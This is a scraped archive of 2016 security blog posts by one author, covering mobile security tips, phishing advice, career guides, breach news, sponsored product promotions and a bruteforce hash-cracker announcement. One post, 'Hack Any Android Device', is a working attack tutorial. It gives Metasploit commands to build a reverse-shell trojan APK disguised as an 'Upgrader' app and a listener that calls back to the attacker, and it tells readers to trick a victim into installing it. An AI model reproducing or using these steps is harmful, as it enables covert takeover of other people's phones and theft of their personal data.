5 Best Ways to Secure Mobile Users

As mobile devices have become essential part of human life, soon it will be used as a tool for the employee to enhance their productivity. While workplace flexibility and convenience is increasing, mobile employees are actually putting enormous amounts of company data at risk. Most of the time employees use third party applications, ignores security updates, access unprotected network connections that leave personal and corporate data at risk and become the easiest target for the cyber criminals.

To reduce such risk from employee end, Alvaro Hoyos, the Chief Information Security Officer at OneLogin has suggested some tips that will surely enable organizations to double check the mobile user’s and the employee’s security.

Realistic Security Policies:

The organizations should prefer more reliable and realistic policies, if they implement policies that are rigged as compare to organization’s maturity, chances are that the employees will subvert or ignore them altogether.
Policies should be strict but also workable, so that it influence employee to follow the policy and get their work done. This is important when it comes to mobile users that operates cooperate applications on their Smartphone or tablets. Policies should be implemented for every device that is being used by the employees.

Multifactor authentication:

As many employees access their information and work for the organization from a remote location, it is most important to assure that right person is using the right information. For that Multi-factor authentication should be used that guarantees the access controls.
The hackers are evolving their attacking techniques; the only way to protect unauthorized access is to implement multi-factor authorization for mobile users to reduce the risk of any hacking incident.

Empower Employee:

Organizations deploy many automated detection systems that alerts them with any uncertain or unexpected activity. This process can spread to granular part of the organization that is employees. By empowering employees to become a part of the organization’s detection plan, employees will get to know about the activities they have direct control over, such as changing their password or logging in from a new location, it will help organization to make employee the part of the early detection plan.

Understanding the Risk of Mobility:

Mobile devices, whether those used by employees or by mobile users, should not be the primary or users with complete access or should be carrying organizational confidential information. The organizations should consider the risk of stolen or misplaced devices, that how devastating it could be. To overcome this critical issue, mobile user should protect their devices with a trusted SaaS solution. Additionally, documents on mobile systems should be backed up on a daily basis.
Furthermore, policies should be defined for the mobile end users that what data can be copied to mobile devices and what data should never leave those same systems.

Continuous Monitoring and tracking:

As employees are accessing the systems from mobile devices in a huge number, it is possible that the device may get lost, stolen or misplaced. In such case asset tracking system should be implemented. No doubt these solutions are expensive, but worth investing to protect an organization’s asset from falling into the wrong hands.  Devices that are no longer in use or have been lost or stolen need to be tracked as well, in case they reappear on your network.

Just as making sure about which remote device is doing what from where, threats will be still there. Monitoring is the best option to expose the uncertain activities to prevent the employees to enter privileged mode or access the restricted information. Unauthorized mobile users can be devastating for any organization, so prevention techniques should be implemented to reduce this risk.

Read more

by Malik korrich ~ vendredi 30 septembre 2016 0 commentaires

Durvasav: Bruteforce Password Cracker

Durvasav bruteforce password cracker is a simple bruteforce password hash cracker program written in C language. It is a console program released under GNU GPL version 3 and runs on Windows. This tool is used to extract plain text from any standard hashes. It uses the OpenSSL library for generating hashes.

Durvasav allows us to compare thousands of hashes to a hash table at a time. It supports MD4, MD5, SHA0, SHA1, SHA224, SHA256, SHA384 and SHA512 standard hashing algorithms. You can also produce hash tables of all these hashes for different character sets or generate wordlists for reverse hash lookup.

Features:

• Supports MD4, MD5, SHA0, SHA1, SHA224, SHA256, SHA384 and SHA512.
• Uses fast OpenSSL library.
• Includes wide variety of character sets and a custom character set.
• Performs ‘pseudo’ operation.
• Hash table generation.
• Generates bruteforce password table.
• Import and compare hash tables containing thousands of hashes.
• Maximum password length of 12 characters (will increase it).
• Wordlist generation for all characters.
• Compatible with Windows 32bit and 64bit.

You can either choose from predefined character sets or a custom character set of your own.

• [0…9] – Numeric from 0-9.
• [a…z] – Small letters from a-z.
• [A…Z] – Capital letters from A-Z.
• [0…z] – 0-9 numeric and a-z alphabets.
• [0…Z] – 0-9 numeric and A-Z alphabets.
• [a…Z] – All small and capital letters.
• [0..a..Z] – All numbers, small letters and capital letters.
• [All] – All numbers, small letters, capital letters and all special characters.
• [Custom] – Select this if you want use a custom character set.

Download Now

Read more

by Malik korrich ~ mardi 27 septembre 2016 0 commentaires

Want to become Security Engineer?

The risk of financial and reputation damage caused by a data breach has led to greater demand for security engineers, and a growing skills gap. However, with a growing skills gap comes greater opportunity for a fulfilling and lucrative career as a security engineer.

So the question is what security engineer is and what skills are required to be one?

A typical responsibility for a security engineer includes installing and maintaining hardware and software (firewalls, antivirus, and intrusion detection) to reduce security risks within an organization.

The security engineer role is about building and maintaining IT security solutions that help organizations to stay protected against cyber threats. This differs from a security analyst, who is concerned with organizational awareness, policy and governance risk management.

Skills and Qualification:

To become a security engineer, in term of qualification, an employee should have a bachelor’s degree in a technical subject. Such as: computer science, cyber security, mathematics, engineering or science.

While experience in network security is beneficial, and certification with industry standard technologies like Juniper, Blue Coat, Checkpoint, Palo Alto Networks, Cisco IOS or Sophos Enterprise Portal would be a bonus. There is also a range of internationally recognized certifications from organizations such as: CEH, CISSP and (ISC).

Tips:

A tip to become security engineer is to start learning new skills straight away. Watch YouTube videos, subscribe to security blogs and keep up-to-date on recent hacks in the news.

Remember, you don't need a Masters in Cyber Security or ten years experience to become security engineer. An enthusiastic attitude and understanding of the main industry challenges can take you a long way.

Moreover, you can also learn different practical based security courses to gain some practical knowledge, a security engineer requires both practical and theoretical backgrounds of security measure that are used to secure organization and it’s information system.

Read more

by Malik korrich ~ dimanche 28 août 2016 0 commentaires

How to win against Phishing attacks?

A Phishing email will typically direct the user to visit a website where they are asked to update personal information, such as a password, credit card, social security, or bank account numbers, that the legitimate organization already has.

Phishing attacks are originated by an attacker from a remote location using some authentic or similar to authentic sources. That tends user to click on their links and disclose their personal information.

The attackers can run a Phishing campaign that takes only five minutes to put together, and within 25 minutes they get the access to corporate data that can lead to an organization-wide breach.

There are some ways to win against these types of attacks.

Check source of Incoming email:

Your bank or other financial institution will never ask you to give your financial detail, passwords or other personal information by email. Never respond to these emails, and in case of any doubt, call your bank for clarification.

Never follow your bank website link from emails:

You should manually logon to your bank’s website, instead of following the provided links through email. It may take you to a dummy page that attacker have created to steal your login information.

Enhance security of your computer:

Being observing is the key to identify the suspicious activities to protect your computer, but you should install a good antivirus solution to block these types of attacks. In addition, also keep your system and antivirus updated to detect latest attacks and malware.

Serve your sensitive data over private and protected websites only:

There are many websites that are not secured, that are acquiring personal details without any security. Avoid such websites and make sure that you are connected to private and secured network and computer before sending your personal and classified information.

Have any doubt? Don’t risk it:

Just in case you have a doubt that the website is acting abnormally or redirecting you towards unnecessary pages, stop there and don’t risk your information. This is the most basic technique to avoid Phishing attacks.

These are some of the basic techniques to overcome and win against the Phishing attacks, but the organizations should also need to create network strategies to restrict users to access only trusted websites. Additionally, emails should be monitored continuously to block malicious links.

Read more

by Malik korrich ~ vendredi 26 août 2016 0 commentaires

Why your security awareness program fails?

The best way to protect organizations from cyber threat is to train employees, conduct an awareness program that enables them to work securely. Although risk is everywhere, millions of people become victim of identity theft each year and the number is rising.

Even the best cyber security solution can’t protect your organization when your employees are unaware of the severity of their routine practice. Regular awareness can train them to handle threats at a granular level.

Many organizations failed to provide successful security awareness to their employees. There are certain deficiencies in awareness programs that are relevant to the poor state of the awareness in many organizations.

Poor Governance:

The greatest deficiency in most of the awareness programs is that they focus on what not to do instead of focusing on what they are supposed to do. Implementation of good security related behavior is the main purpose of this awareness program. In other words, security awareness programs should be the promotion of behaviors defined in governance.

Security policies and procedures are not referred when conducting day to day tasks; it is the major flaw that skips the detection of threats on a routine bases.

Relying on Fear:

In many organizations, the awareness program lacks the positive promotion of procedures and techniques. This is a gross mistake that makes security awareness program a big flop. Organizations are more concerned with frightening the employees so they adopt the awareness tips, surprisingly, it left employee afraid to do their basic routine task.

Awareness program should not scare the employees; instead make them more confident to look ahead while performing their tasks safely.

The Hacker Mentality:

The main objective of awareness program is to tell people that how a hacker can hack them and then telling not to fall victim to it. For example, they will tell you how a hacker can ask for your password over the phone, but you should not give out your password over the telephone.

The deficiency in telling what not to do specifically is that the hacker will apply other techniques to acquire the passwords. They can ask the employee to modify registry files in the computer, as they are not told to deny such activity in an awareness program.

Bad Technical Security:

The users should not be allowed to install software on systems, therefore ransomware should not be allowed to install on a system, if a user opens a malicious file. Storage devices should be encrypted and access to the suspicious and unsafe website should be prohibited.

Although, users are aware of threats and security, but leaving technical security can be dangerous. It will work as a second layer to the end user that is securely operating. Poor technical security enables the inevitable user failing to become a serious incident.

Treating Awareness as an ordinary activity:

While treating awareness program as ordinary activity, you are allowing insecure access to the internet from your own employees. It can be disastrous to the organization if attacker compromises or trick user to gain access.

Making awareness program the top priority is the only solution to overcome many threats at initial and base level. Many organization think it’s unnecessary to do so, and it changes the whole scenario when came in contact to any cyber attack.

The underlying problem is that security awareness programs are more difficult to implement than most security professionals want to acknowledge. It requires appropriate knowledge, skills, and abilities to implement a security awareness program more effectively. Organizations should consider not repeating such common mistakes to make their security awareness program successful.

Read more

by Malik korrich ~ jeudi 25 août 2016 0 commentaires

Identify the Gaps in Your Security Strategies

Every day we hear stories about Businesses lose critical data; regardless of billions of dollars invested in cyber security, we have failed to provide full proof security. We’ve secured our organizations by building layers of walls around networks, applications, storage, identity and devices.

Data security company Vera has identified some shocking gaps in security policies to help enterprises better understand and diagnose their data security loopholes.

Behavioral Gap

According to breach study by Ponemon, it has been noticed that human negligence is responsible for 25% of data breaches globally.

Most of the time employees avoid using internal systems and software tools for their routine task. That is the biggest behavioral gap an organization can have. Employee bypasses the secure File Transfer Protocol (FTP) servers by simply copy and pasting data into insecure files and then sends it from their personalized email accounts. This is the major gap where transmission of sensitive data remains undetected by the enterprise security layers.

Visibility Gap

The data is lost when companies are unable to trace that where, when and for what the information is being used. The big question is that what is being done with your information by third party vendors? Most of the employees receive files unintentionally. If data is regulated, businesses bear responsibility for it, even when you cannot see it.

Control Gap

The ability to lock down access to the lost documents is gone when data in slipped away or passed the security layers of the organization. There isn’t any undo button for lost files to revoke the access controls to access the information. It’s the root cause of many cloud collaboration and storage fear that need to be addressed sooner before it’s too late.

Response Time Gap

We lose data because of the time delay it takes to identify and respond to the incident and new technologies that are sharing enterprise data. Many employees do their task regardless of its security impact and then information security is left way behind. Enterprises require security that operates at the speed of business, with the flexibility to be adapted by each and every employee and stakeholders.

Mobile Security

The phones and tablets your employees and partners use to access information is the main concern for enterprise security. The security gap is created when employee, customers and partners start using mobile devices for personal use as well. The third party application can easily breach the security layer of the organization’s system and can cause information leak. This gap can easily overcome by conducting awareness sessions for each and every stakeholder that is dealing with the company’s information.

Businesses today simply cannot fill security gaps by following old strategies to secure information. It’s time to look at protecting the data throughout its entire life cycle from its propagation from employee to outside the organization, application and devices then further where that information is being used as well. That’s the only way we can overcome these gaps and protect the information at its best.

Read more

by Malik korrich ~ samedi 13 août 2016 0 commentaires

Secured! Think Again About That Printer in the Corner

In many organizations the printers are used too often and in some it is collecting dust, apparently, it’s the best target that can be used as an attacking surface. There are countless companies who don’t bother about updating the firmware of their printers, leaving their documents open to attackers. The inventories like printers and others are not even discussed in annual security audits and are assumed to be useless in security aspects.

As printers are seemingly harmless, that’s the exact reason it poses a serious threat. Sometimes, the best attack vector for an attacker is the one to which no one bothers to think about. However, a recent IDC survey found that 35 percent of all security breaches in offices were traced back to an unsecured printer or multi-function device, costing companies $133,800 each year.

Why Companies Should Consider Printer as a Security Threat?

As printers are the essential inventories to business from small organizations to huge corporate level organizations and are ignored when it comes to vulnerability management and assessment. Enterprise security tools are only to protect computers and network; they often do not block or monitor access from the printers. That makes the printer a trouble-free approach to the attacker.

Chris Vickery, a white hat hacker and Security Researcher at MacKeeper said: “Getting control of a printer within an organization can provide a foothold for further attacks and a position to ‘pivot’ out of into networks”.

There are some serious effects if the printer gets compromised and used by attacker, like attackers can capture every document sent to the printer. It could be serious business intelligence comprise that no organization can tolerate.

Preventing Data Loss from Printers

It’s too easy to suggest one ultimate security tip to prevent such threat that includes the replacement of outdated printers with newer models that have some latest security features. Furthermore, Data encryption should be introduced to all latest printers to prevent data exposure if compromised. Although it has been adopted by Xerox in March 2016, other companies should also consider this feature to introduce with their products.

In the end, as IT administrators are responsible to configure printer and other multipurpose device in an organization, they should be aware of the threats associated with those devices so some serious countermeasures can be taken prior to the transmission of data.

Read more

by Malik korrich ~ mercredi 10 août 2016 0 commentaires

Threats against the next billion devices

The Cyber attacks are not like the natural disaster or other forces of nature nor are they like diseases or other autonomously evolving and spreading agents yet. They are eventually driven by human actions. It depends on the intuition of human that how he uses the communication medium and technology. Since, the economics is the best way to view attacker and defender strategies that how it is affecting in term of money. The traditional approach to defense is to raise the cost for your attackers by making attacks as difficult as possible. This, unfortunately, has a tendency to raise costs for the defender and their users too and does not scale well. The most scalable strategy is to reduce the loss from the successful attacks.

What does this look like? The new strategies are already being implemented on many areas of interest and we will point out where it is being employed successfully. We will further examine the phases of intrusions that are financially motivated and state sponsored attacks to show how defenses based on lowering the value versus raising the cost affect both the attackers and defenders. Finally we will explore about the strategies for security threat against the next billion devices.

Read more

by Malik korrich ~ samedi 23 juillet 2016 0 commentaires

How to Protect your Data in the Era of Ransomware

The era of ransomware is upon us. Organizations, small businesses and individuals have been affected by dangerous ransomware attacks in past years. Ransom, that refers to some kind of payment that is demanded in exchange for the release of someone or something that has been taken, is a yet effective ploy that has been used by criminals for many years. Locky, a new variant of ransomware, encrypts files of cybernauts and adds a .locky file extension to them, leaving them unaccessible until the ransom is paid. Actively spreading since February 2016, this infection has been the most threatening this year.

Data is the most valuable thing for any individual or organization, so it is understandable that many business owners are rightfully concerned about the rising threat of ransomware. The most important aspects to consider are the steps that common users and professionals should take to protect organization and personal data from these ransomware attacks.

'No malware is pleasant, but there is something truly awful about ransomware. Paying the ransom is not just a declaration of defeat, but also a confession that preventative measures weren't taken. Cybersecurity awareness, a robust email security solution, internet monitoring software, and protecting your endpoints will go a long way to better prevent ransomware,' says Sergio Galindo, President and COO of GFI Software, a company creating solutions that allow companies to protect from various cyber threats.

Over the last few years, several software companies have released solutions which can protect your organization from ransomware threats such as Locky. These solutions bring the protection against malicious email attacks and ensure that every employee’s web browsing and downloading is secure.

The solutions provided by GFI Software are not only limited to organizations, individual users and small businesses can also use the software. GFI WebMonitor can allow you to monitor and control your web activity along with management of internet usage of your employees, so that no unsafe websites can be accessed from your corporate network. GFI MailEssentials will help you and your organization to fight against ransomware attacks coming through emails. The solution enables effective spam filtering and blocks emails containing malwares like Locky.

Organizations need to reshape their cyber security policies, if they want to stay ahead of new ransomware threats. Deploying the necessary security solutions with immediate effect is the only way to secure the precious data of an organization.

I partnered with the brand to write this article but every word is mine

Read more

by Malik korrich ~ mercredi 20 juillet 2016 0 commentaires

Hack Your Website First Before Hackers Do. Beat Them at Their Game

In recent years, website and web application release cycles have become increasingly short. Initially, these short release cycles were a result of companies attempting to remain competitive — offering more feature-rich applications and responding to consumers demands more quickly.

As a result, end-users have largely been conditioned to expect a continual flow of updates and new releases — companies have gone so far as to publish software development roadmaps so their customers can be kept apprised of what to expect in the immediate and near-term releases.

While short release cycles and frequent updates are often seen as a positive, there is also a dark side that needs to be considered. One of the first causalities in the “race to release” is web application security. In an attempt to launch websites and ship web applications as efficiently as possible, security has become an afterthought.

Despite the risks associated with a potential security breach (something we covered in this post), web application security often takes a backseat to revenue, profit and customer satisfaction. Given that a 100% secure web application is an impossibility, that might seem like a reasonable approach. After all, security is rarely considered an issue until it’s too late.

One potential solution to this problem is to spend time looking at your website or web application from the perspective of a hacker — in essence, figure out how to hack your website before someone else does.

The Hacker’s Mentality: Why And How?

There is a saying (concept) that floats around web application security circles called “Hack Your Website First”. The idea behind this saying is one which promotes a more proactive approach to security. As we mentioned in the opening paragraphs, web application security is often an afterthought — that is, until an application is hacked. Of course, by then it’s usually too late. The damage has been done.

“Hack your website first” seeks to develop the mindset in which developers and security professionals actively seek out potential vulnerabilities in web applications the same ways that a hacker would. It’s an approach that makes a lot of sense — if you can learn to think like the enemy, you stand a much greater chance of defeating them.

Ask yourself: How would your overall security posture improve if you were to take a day or two away from the development process and look for ways to hack your website or web application?

Think Like a Hacker

Often, two of the most significant obstacles when it comes to managing web application security is understanding:

1.    Which are the primary vulnerabilities that hackers are looking to exploit?

2.    What tools and techniques are they using to not only find but exploit those vulnerabilities?

Understanding which vulnerabilities are most commonly exploited is the first step in learning to think like a hacker. The most commonly exploited vulnerabilities are those of the technical variety. For example, cross-site scripting (XSS), SQL Injection and command injection.

Obviously, logical vulnerabilities should also be an important consideration. But in reality, they are often less susceptible to attack simply because they are more time intensive to exploit and require a greater level of expertise.

If you are someone who finds analogies to be useful, look at securing technical vulnerabilities as the equivalent of locking all the doors and windows on the ground floor of your house before going to bed. Logical vulnerabilities, on the other hand, are more in line with a burglar setting up a step-ladder, climbing on the roof of your home and looking for an open skylight. It’s possible but less likely to happen. You can read the differences between technical and logical web applicationvulnerabilities for more detailed information.

Act Like a Hacker

Hackers are people too. That means that they have all the traits and tendencies of developers and programmers. If there is an easier or more proficient way of completing a task, they’ll take advantage of it.

While you may be inclined to think that hackers spend hours on end searching for vulnerabilities but they’re smarter than that. More often than not, hackers are using automated tools and scripts to find and exploit vulnerabilities. Tools like sqlmap, sqlninja, Canvas, BruteXSS and Core Impact are often used in the process of identifying and exploiting vulnerabilities. These tools reduce the amount of time and effort that hackers need to expend and vastly increase their reach.

If you think that your web application is unlikely to be a target of hacking, think again. The target itself is rarely relevant. Hackers are looking for access to your server resources and bandwidth. If you pay for it, hackers are happy to take it from you.

If you’re going to put forth an honest attempt to hack your websites or web applications, you’ll need to employ tools and techniques that are similar to the hackers. Using an automated web scanner is one of the best (and easiest) ways to scan one or even hundreds of websites and web applications.

Using the right tools also means that once a vulnerability is identified, the process of remediation should be largely automated. Flagging the vulnerability, assigning it to a developer for patching, re-testing and reporting can all be automated by a capable web application vulnerability scanner.

Know Thy Enemy (Hackers)

In The Art of War, Sun Tzu stated that “If you know the enemy and know yourself, you need not fear the result of a hundred battles”.

By learning to hack your website or web application first, you'll develop an intimate knowledge of the tools, vulnerabilities and exploits that are often used by hackers.

Staying ahead of hackers and eliminating all web vulnerabilitiesbefore they can be exploited can prove to be a challenging task. To a large extent, one of the most effective ways of reducing potential attack vectors is by being proactive - Think and act like a hacker to beat them at their own game.

Read more

by Malik korrich ~ lundi 11 juillet 2016 0 commentaires

Cyber Security Career Guide

What is a Cyber Security Specialist?

Cyber security specialist works with the companies to secure computer systems. They acquire staff about their current security methods. They inspect whole system and classify company’s data with its severity. They find out what information needs protection. Cyber security specialists are also responsible for defining the access level for the employees that what information should be accessible to specific user. Security specialists use their findings to plan the security policies and strategies. They regularly train staff on how to use security software and properly use computers to prevent any cyber attack.

Specialists evaluate security breaks and determine if there are problems or errors. If there is a problem, specialists track where the break came from and shut off the access point.

Why to Become Cyber Security Specialist?

The career of cyber security is expected to grow faster than average rate. An increase in cyber security jobs is expected as technology continues to advance and attackers being highly active. More businesses will go online, that somehow requires cyber security plans and strategies to secure them.

Education Path:

There are many ways to become cyber security specialist. Many employers prefer to hire people with some formal university background, Bachelor’s degree in computer science majors in information security. Another Route is self study and then gets certified.

An important part of preparing for this field is learning the latest technology. Some people learn through classes and other teach them self by online courses and tutorials.

Formal Studies: 

Many people choose to take the formal degree plan to become specialized with a degree. For them, Master’s in Cyber Security is best they can choose. Another degree to become a Cyber Security Specialist, which is a more practical based study, is Information Security Assurance.

Certificates:

As with other computer science degree, certificates increase your appeal to employers. Only bachelor degree won’t teach you cyber security in depth, so self studies, tutorials, online courses and certifications will lead you towards the specialized zone.
Some recommended courses are:

Certified Ethical Hacker (CEH)
Certified Information Systems Security professional (CISSP)
Certified Network Defense Architect (CNDA)
Certified Network Security Administrator (NSA)

Many of the courses are available and taught online in highly affordable rates, just to overcome the shortage of cyber security professional in the world of growing security threats.


Salary and Wages
The increasing need for cyber security professional has raised the average salary for the field. An average Security consultant earns $50,000+ annually. The average annual salary is $60,000. This shows the demand for cyber security professionals by the companies.

Once you’ve got a cyber security career in mind, we recommend you do a quick search for that job on major employment sites (SimplyHired, Monster, Indeed, etc.). This will give you a sense of what kinds of current qualifications, certifications and degrees employers want to see.

However the lists of hard skills and certifications are not written in stone. They’re simply suggested starting points. You may find some of them unnecessary; you may require more specialized skills for your dream job. Again, feel free to take away what you find useful.

Read more

by Malik korrich ~ mardi 5 juillet 2016 0 commentaires

Hack Any Android Device

Android devices are widely used around the world; applications are making this platform preferable by millions of users. As these devices are used by many, hackers are exploiting it to harm users and steal personal data.

In this tutorial we are going to learn how to hack any android device with Kali Linux. This tutorial will explain you step by steps:

Step 1:

• Open a terminal, and make a Trojan.apk
• You can do this by typing :
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)

Step 2:
• Open another terminal until the file is being produced.
• Load metasploit console, by typing : msfconsole

Step 3:
• After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler

• Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
• To set Lhost type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4:

• At last type: exploit to start the listener.
• Copy the application that you made (Upgrader.apk) from the root folder, to your android phone.
• Send it to victim’s device and let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
• And when he clicks Open, exploit will run and you will get access.

However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) Go to security settings of the android phone to allow the Trojan to install. There is condition for this exploit that victim must install/open your sent Trojan, this will allow you to enter victim’s device.

Follow these simple step and exploit any android device.

Read more

by Malik korrich ~ samedi 2 juillet 2016 1 commentaires

OurMine Hacked CEO of Google and Others

Earlier this month, we heard that Facebook CEO Mark Zuckerberg’s Twitter, Instagram and Pineterest accounts got hacked by a hacker group “OurMine”. The hacker taunted “Hey @finkd we got access to your Twitter, Instagram and Pinterest, we are just testing your security, please DM us”. This news revealed the major security breach into accounts of different celebrities.

Google CEO Sundar Pichai has become the latest victim of this hacking group “OurMine” after his Twitter linked Quora account got compromised and filled with spam links and post.

After many spam posts on these accounts, this breach gone public as followed by many followers. OurMine group said it managed to breach Pichai’s account by exploiting Quora’s zero-day vulnerability. However, Quora has not responded yet on this flaw.

Surprisingly, OurMine has set up a website that displays a range of vulnerability scanning service and with a refund policy if the service didn’t work. In a short message they said “We are just testing people security, we never change their passwords, and we did it because there are other hackers who can hack them and change everything”.

It is believed that hackers are using the old exploited data dumps and also taking help from recent breaches and information leaks. The old passwords and credential that are still being used by many celebrities and individuals are the main factor behind these attacks.

A hacker “AlexPro” has exposed the hacker group “OurMine” by releasing the IP address and location they are operating from. It seems to be some Arabic people as traced location is Saudia Arab.

However, it is likely the team is using TOR and VPN to remain untraceable, as both are used to route internet traffic around the globe to hide the actual location.

On the rapid breaches on many social media sites, the Twitter spokesperson told the BBC: “A number of other online services have seen millions of passwords stolen in the past several weeks, and we know far too many people use the same password for multiple things online. We recommend people use a unique, strong password for Twitter”.

So it is highly recommended to use different passwords for all different accounts over internet to secure yourselves to some extent.

Read more

by Malik korrich ~ lundi 27 juin 2016 0 commentaires

Russia Demands Backdoor to Monitor Chats on Messaging App

Cyber security threats in Russia and its neighbors in the west are escalating. In the past few years, Russia violated many land borders by unannounced crossing and humiliating their privacy. Russia has been developing and employing offensive cyber capabilities for years. Russian cyber attacking groups consist of professionals, highly skilled practitioners, whose daily jobs are to prepare and carry cyber attacks.

Recently few days back, the Russian government is planning to pass a new mass surveillance bill, which will allow the Russian Federal Security Service to monitor the chats of every single messaging application in Russia.

In this bill, they demands the backdoor to every messaging app. The provider of apps like Whatsapp, Viber, Telegram and others are required to provide necessary backdoors to the government or they could face a fine of up to 1 million rubles.

The bill is suggested by Russian Senator Elena Mizulina, who said on a TV show that, she is deeply concerned about the closed chatrooms on messaging apps. Teenagers are being targeted, brain-washed by extremist to do criminal activities and different attacks.

This bill will help Russian government to monitor every messaging app to detect such chats that are suspicious or related to any terrorist. The bill has already been approved by Duma (a Russian’s lower Legislative House) and if this legislation is passed into law, then each and every messaging app must follow the law and provide backdoors to the government of face fine.

This bill also states that the citizens who complies decrypting electronic communication will face a fine range between 3000-5000 rubles, while officials who stand in the way can potentially be fined 30,000-50,000 rubles.

As we have already known that, Whatsapp already implemented end to end encryption to secure user’s communication from intruders. Viber also announced this feature to its messenger, but after this law government will be able to monitor all applications including those with End-to-End encryption. These applications now have to choose whether to make their services unavailable after this law or provide backdoors and compromise their customer’s privacy.

Read more

by Malik korrich ~ mercredi 22 juin 2016 0 commentaires

How to protect your confidentiality and prevent data leakage

In this modern era the data security is a big issue every organization is facing. As the time passes the security threats of every organization are increasing. Many businesses suffered huge financial losses because of the leakage of their confidential data in the past few years.

Even the world’s most powerful government officials aren’t safe from these modern day security threats. Hillary Clinton a candidate for next presidential election in the United States suffered from data leakage; when her emails were compromised.

During the past 12 months some of the world’s biggest organizations and governments like Anthem, My Space, Syrian Government, and Philippines Commission of Elections were targeted. Sometimes it’s the attacks like these where your hands are tied and you can’t do anything to prevent them.

However, there are many other ways which leads towards the accidental data leakage of your organization. Researchers have seen Emails as one of the biggest source of data leakage in this modern era. As emails took over postal mails as the primary medium of communication between organizations; the security risk has been rapidly increased ever since.

Confidentiality of a business is something you can’t take risks upon. Historically, we have seen once business confidentiality and its client’s database is leaked; the only thing that follows it is huge financial losses. It doesn’t matter if you are a Lawyer, Health care institute, Bank or some multinational chain – Risk of your data leakage through emails are always on the high side if proper measures aren’t in place.

SafeSend is one of the most trusted software for securing your data from accidental leakage. World’s top most organizations like Samsung, Allianz, EPSON has already put in place security measures, which will prevent any accidental data leakage of their business activities. Those businesses that aren’t considering accidental data leakage a security threat are sitting on a time bomb and waiting for it to explode. All it takes is a common mistake by your employee to leak organizations confidential data and sometimes it can be on purpose if your employee is disgruntled on something.

Making a security move in this era of cyber security can only increase the satisfaction level of your clients. After all everyone wants to know, how secure they are while connected with your business. Safesend will be the perfect solution to increase your organization’s security measures along with the level of satisfaction of your top clients. We always suggest our readers and followers the best possible cyber security solutions available in the industry. SafeSend have a proven record and with most of its business activities are in U.S and Britain - It’s the market leaders in preventing accidental data leakage.

I partnered with the brand to write this article but every word is mine

Read more

by Malik korrich ~ jeudi 9 juin 2016 0 commentaires

The outcome of the Notorious Teamviewer hack

Over the past few months, the users of teamviewer, a remote access service have been discussing their experience of being ransacked by attackers, who somehow gained access to their accounts. In many of the cases, online thefts reportedly drained user’s PayPal and other bank accounts. No one knows the exact number of accounts being hacked yet, but there’s no denying that the Teamviewer is breached.


For more than a month, many social media sites and blogs have received such numerous reports. Many often claimed that the intrusions are the reason for this failure, which has an effect on many others.

The attacker did transactions and shopped online using user’s PayPal and bank details, many caught this and rolled back the transactions but many left helpless. Nick Bradley the Security Researcher at IBM reported his experience, "In the middle of my gaming session, I lose control of my mouse and the Teamviewer window pops up in the bottom right corner of my screen, As soon as I realize what is happening, I kill the application. Then it dawns on me: I have other machines running Team Viewer!"

He continued:

“I run downstairs where another computer is still up and running. Lo and behold, the Teamviewer window shows up. Before I am able to kill it, the attacker opens a browser window and attempts to go to a new web page. As soon as I reach the machine, I revoke control and close the app. I immediately go to the Team Viewer website and changed my password while also enabling two-factor authentication. Lucky for me, those were the only two machines that were still powered on with Team Viewer installed. Also lucky for me is the fact that I was there when it occurred. Had I not been there to thwart the attack, who knows what would have been accomplished. Instead of discussing how I almost got hacked, I’d be talking about the serious implications of my personal data leak.”

The threat is that if personal data or bank transaction is performed without being noticed then who is responsible for their losses. That made the users of Teamviewer insecure and creates a bad impression on them.






 


These statements made Teamviewer to announce two measures to introduce in response to the huge number of reported hijacking. The first measure “Trusted Devices”, ensure that the account holder must explicitly confirm that the new device is trusted before access is granted to existing accounts for the first time.

The second measure is “Data Integrity” which provides automatic examine that detects when an account goes hacked. "The system determines continuously if your Teamviewer account shows unusual behavior (e.g. access from a new location) that might suggest it has been compromised," said Axel Schmidt the spokesperson of Team Viewer.

Read more

by Malik korrich ~ mardi 7 juin 2016 0 commentaires

The Ultimate Guide to Security Threats

Internet security expert McAfee is helping everyday web users to get up to speed with the threats they face online with a new tool.

The firm has launched The Ultimate Guide To Security Threats in a bid to raise awareness of the common dangers that lurk within the realms of the world wide web.

The guide, embedded below, offers an at-a-glance resource for users to bookmark and understand viruses, spam, spoofing, phishing, Trojan horses, botnets, worms, spyware and DDos attacks.

It also looks at a timeline of high profile recent hacks, demonstrating the scale and severity of the security risk – as well as the increasing sophistication and ambition displayed by cyber criminals.

Brought to you by McAfee - Intel Security

Read more

by Malik korrich ~ lundi 16 mai 2016 0 commentaires

Learning Basic Cyber Security from Online Videos

If you’re interested in learning basic cyber security then one of the best ways of doing so is by making full use of the resources that are readily available. With the internet at your fingertips there’s a lot of options out there, but one of the fastest ways to anyone to wrap their head around the essentials of cyber security is by delving into many of the videos that are online.

Types of Cyber Security Videos

Generally speaking, the types of cyber security videos that you’ll find tend to vary – but most fit into the following sort of varieties:

• Introduction style videos that give you a rough overview of cyber security and what it is all about.
• Concept style videos that talk about some of the concepts associated with cyber security and may focus on specific topics such as exploits, viruses, or vulnerabilities.
• ‘How to’ style videos that show you how to perform some of the activities that are associated with cyber security.

As you can imagine, each of these types of videos is useful in its own way and when you first start there’ll definitely be benefits to watching all three. Later on the ‘how to’ video guides may be a bit more important however, as they’ll teach you how to actually do some of the things that you want to do.

Where to Find the Videos

Nowadays there are tons of different websites and video sharing platforms where you can find the videos that you need – but YouTube is a fairly good place to start. Alternatively you could use Google’s video search or even just look for cyber security websites that have their own videos.

Most of the videos that you find will be streamed, but seeing as that’s the norm it is to be expected.

Saving Cyber Security Videos for Reference

It might be a good idea to save some of the more useful cyber security videos that you find for reference. However because these videos are being streamed, you’ll need to work around it and use a desktop recordersuch as the Movavi Screen Capture Studio to get it done.

With the Movavi Screen Capture Studio you’ll be able to record the video easily however, and then you can use its other features to cut the video into segments so that you only keep the parts that are really important. If you like you can do this to several videos and then merge the important bits that you’re keeping together.

Also you can use the other features to enhance the video quality, insert customizable text, add background music or voiceovers, or even use special effects and filters. It is worth noting that you can even use the Movavi Screen Capture Studio to extract audio from video, just in case you want to save the videos in audio-only format.

By saving the better videos, you can be certain you’ll always have them on hand for reference should the need arise.

Read more

